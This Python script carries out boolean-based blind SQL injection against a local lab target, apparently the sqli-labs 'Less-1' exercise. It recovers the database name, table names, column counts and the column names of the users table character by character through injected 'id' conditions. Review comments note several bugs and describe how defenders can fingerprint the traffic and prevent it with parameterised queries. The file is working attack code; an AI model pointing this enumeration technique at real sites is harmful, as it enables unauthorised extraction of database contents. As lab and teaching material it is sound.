import requests

# Boolean-based blind SQL-injection walkthrough against a local lab target.
# Nothing is ever read out of a query result; each probe appends a condition to
# the `id` parameter and treats the presence of the marker string
# 'Your Login name' in the response as "condition true".  Every value
# (database-name length, database name, table count, table-name lengths, table
# names, column counts, column-name lengths, column names) is recovered one
# equality test per request, so a full run issues a very large number of GETs.
# NOTE(review): the target is hard-coded to 127.0.0.1:8888/Less-1 (a local
# exercise instance); the marker string and URL layout are specific to it.
# Defender's view: this traffic is easy to fingerprint — sequential `and N=...`
# conditions against the same id, `information_schema` lookups, the `--+`
# comment terminator, and a burst of near-identical requests from one client.
# Parameterised queries on the server side remove the underlying weakness.
if __name__ == "__main__":
    # Working state.  Several of these names are reused as `for` loop
    # variables and are read *after* the loop (Python keeps the last value
    # assigned), so the initial values only matter if a loop body never runs.
    db_length = 1
    db_url = ''
    db_name = ''
    db_ascii = 1
    db_place = 1
    tb_sum = 1
    tb_url = ''
    tb_num1 = 0
    tb_lname = 0
    tb_array = []
    tb_nameasc = 0
    tb_namenum = 0
    tb_namepla = 0
    tb_nameurl = ''
    tb_name = ''
    tb_arrayname = []
    # Step 1: length of the current database name.
    print('开始猜解数据库名长度')
    # Base URL; the trailing "'+" closes the quoted id value so the appended
    # condition becomes part of the WHERE clause.
    url = "http://127.0.0.1:8888/Less-1/?id=1'+"
    for db_length in range(1, 100):
        db_url = f"{url}and {db_length}=(select length(database()))--+"
        # NOTE(review): no timeout= on this (or any later) requests.get, so a
        # stalled server hangs the script indefinitely.
        r = requests.get(db_url)
        if 'Your Login name' in r.text:
            print('[!] ' + db_url)
            print('猜解结束')
            break
        else:
            print('[x] ' + db_url)
    # If no length matched, db_length is simply the last range value (99) and
    # everything below proceeds on that wrong assumption.
    print('数据库名长度：%d' % (db_length))
    pass
    # Step 2: the database name itself.
    # One request per (position, candidate ascii value): ascii(substr(database(),x,1)).
    print('----------------------------------------------')
    print('\n\n正在猜解数据库名.......')
    # NOTE(review): this assignment is never used — it is overwritten on the
    # first pass through the loop below (and lacks the `url` prefix).
    db_urlname = 'and %d=ascii(substr(database(),%d,1))--+' % (db_ascii, db_place)
    for db_place in range(1, db_length + 1):
        # Candidate values 0..126; a character outside that range is never found
        # and the position is silently skipped.
        for db_ascii in range(0, 127):
            db_urlname = url + 'and %d=ascii(substr(database(),%d,1))--+' % (db_ascii, db_place)
            print(db_urlname)
            r = requests.get(db_urlname)
            if 'Your Login name' in r.text:
                db_name = db_name + chr(db_ascii)
                print('[!] ' + db_name)
                break
            else:
                continue
    print('end.......')
    print('数据库名：' + db_name)
    # Step 3: number of tables in the current schema:
    # select count(table_name) from information_schema.tables where table_schema='security';
    print('\n\n开始猜解表数.......')
    # Only 1..9 tables are considered; if none matches, tb_sum ends up as 9.
    for tb_sum in range(1, 10):
        tb_url = url + '+and %d=(select count(table_name)  from information_schema.tables where table_schema=database())--+' % (
            tb_sum)
        r = requests.get(tb_url)
        if 'Your Login name' in r.text:
            print('[!] ' + tb_url)
            break
        else:
            print('[x] ' + tb_url)
    print('猜解表数结束')
    print('表数：%d' % (tb_sum))
    # Step 4: length of each table name:
    # select length((select table_name from information_schema.tables where table_schema=database() limit 0,1 ));
    # +-----------------------------------------------------------------------------------------------------+
    # | length((select table_name from information_schema.tables where table_schema=database() limit 0,1 )) |
    # +-----------------------------------------------------------------------------------------------------+
    # |                                                                                                   6 |
    # +-----------------------------------------------------------------------------------------------------+
    # 1 row in set (0.00 sec)

    # mysql> show tables;
    # +--------------------+
    # | Tables_in_security |
    # +--------------------+
    # | emails             |
    # | referers           |
    # | uagents            |
    # | users              |
    # +--------------------+
    # 4 rows in set (0.00 sec)
    print('\n\n开始猜解每一个表名长度')
    # NOTE(review): range(0, tb_sum + 1) probes one more `limit` offset than
    # the table count found above; the extra offset presumably matches nothing
    # and only costs requests.
    for tb_num1 in range(0, tb_sum + 1):
        # Lengths 1..19 only; a longer name is never recorded, which leaves
        # tb_array shorter than tb_sum and breaks the indexing in Step 5.
        for tb_lname in range(1, 20):
            tb_lengthurl = url + '+and %d=length((select table_name from information_schema.tables where table_schema=database() limit %d,1 ))--+' % (
                tb_lname, tb_num1)
            r = requests.get(tb_lengthurl)
            if 'Your Login name' in r.text:
                tb_array.append(tb_lname)
                print('[!] %d' % (tb_lname) + '>>%s' % (tb_lengthurl))
                # No effect: the loop variable is re-bound by the next outer
                # iteration anyway.
                tb_lname = 0
                break
            else:
                continue
    for i in range(0, len(tb_array)):
        print('猜解结束第%d个表名长度分别为：%d' % (i + 1, tb_array[i]))
    print('猜解各个表名长度结束')
    print('\n\n')
    # Step 5: each table name, character by character:
    # select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1  ),1,1);
    print('猜解各个表名开始...........')
    # Indexes tb_array by table number — raises IndexError if Step 4 recorded
    # fewer lengths than tb_sum.
    for tb_namenum in range(0, tb_sum):
        for tb_namepla in range(1, tb_array[tb_namenum] + 1):
            for tb_nameasc in range(0, 128):
                tb_nameurl = url + 'and %d=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1  ),%d,1))--+' % (
                    tb_nameasc, tb_namenum, tb_namepla)
                r = requests.get(tb_nameurl)
                if 'Your Login name' in r.text:
                    tb_name = tb_name + chr(tb_nameasc)
                    print('[!] ' + tb_name)
                    break
                else:
                    continue
        tb_arrayname.append(tb_name)
        tb_name = ''
        print('\n')
    for i in range(0, len(tb_arrayname)):
        print('猜解结束第%d个表名为：%s' % (i + 1, tb_arrayname[i]))
    # Step 6: column count per table (counts 1..9 only).
    cl_osum = []
    print('\n\n开始猜解列个数...........')
    for i in range(tb_sum):
        for j in range(1, 10):
            # NOTE(review): the column-count lookup is not qualified by
            # table_schema, unlike the table queries above.
            cl_sumurl = url + 'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+' % (
                j, tb_arrayname[i])
            r = requests.get(cl_sumurl)
            if 'Your Login name' in r.text:
                cl_osum.append(j)
                print('[!] ' + cl_sumurl + '>>匹配成功')
                break
            else:
                continue
    # IndexError here if any table's count was not found (cl_osum shorter than tb_sum).
    for i in range(0, tb_sum):
        print(tb_arrayname[i] + '列数：%d' % (cl_osum[i]))
    print('猜解列个数结束')
    # Reference output the author captured for the column-count query:
    ##mysql> select count(column_name) from information_schema.columns where table_name = 'users' limit 0,1;
    # +--------------------+
    # | count(column_name) |
    # +--------------------+
    # |                  3 |
    # +--------------------+
    # 1 row in set (0.01 sec)

    # Earlier variant of Step 6 kept by the author; not executed.
    # for i in range(4):
    #     for j in range(1,10):
    #         cl_sumurl = url+'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+'%(j,tb_arrayname[i])
    #         r=requests.get(cl_sumurl)
    #         if 'You are in...........' in r.text:
    #             print(tb_arrayname[i]+'的列数为：%d'%(j))
    #             break
    #         else:
    #             continue
    cl_lensum = []
    cl_lennam = []
    # Step 7: column-name lengths, hard-coded to the "users" table only.
    # NOTE(review): probes 4 `limit` offsets here, while Step 8 below reads
    # only 3 of them (the author's note says users has 3 columns).
    for j in range(0, 4):
        for l in range(1, 20):
            cl_len = url + 'and %d=length((select column_name from information_schema.columns where table_name="users" limit %d,1 ))--+' % (
                l, j)
            r = requests.get(cl_len)
            if 'Your Login name' in r.text:
                cl_lennam.append(l)
                print('users>>第%d列长度为：%d' % (j + 1, l))
                break
            else:
                continue
    print('\n')
    print(cl_lennam)
    # Step 8: column names, character by character:
    # select ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1));
    # +-------------------------------------------------------------------------------------------------------------+
    # | ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) |
    # +-------------------------------------------------------------------------------------------------------------+
    # |                                                                                                         105 |
    # +-------------------------------------------------------------------------------------------------------------+
    # 1 row in set (0.01 sec)
    # Goal: the names of the three columns of the users table.
    cl_name = ''
    cl_namearr = []
    # Indexes cl_lennam[j] for j in 0..2 — IndexError if Step 7 found fewer than 3 lengths.
    for j in range(0, 3):
        # NOTE(review): this range starts at 0, so the first probe asks for
        # substr position 0; MySQL returns '' there, whose ascii() is 0, which is
        # why chr(0) gets appended and stripped again below.
        for i in range(cl_lennam[j] + 1):
            for cl_ascii in range(0, 128):
                cl_admin = url + 'and %d=ascii(substr((select column_name from information_schema.columns where table_name="users" limit %d,1),%d,1))--+' % (
                    cl_ascii, j, i)
                r = requests.get(cl_admin)
                if 'Your Login name' in r.text:
                    cl_name = cl_name + chr(cl_ascii)
                    print('[~]' + cl_name)
                    break
                else:
                    continue
        # Drops the chr(0) produced by the position-0 probe above.
        cl_name = cl_name.strip('\x00')
        cl_namearr.append(cl_name)
        cl_name = ''
        print('\n')
    print(cl_namearr)
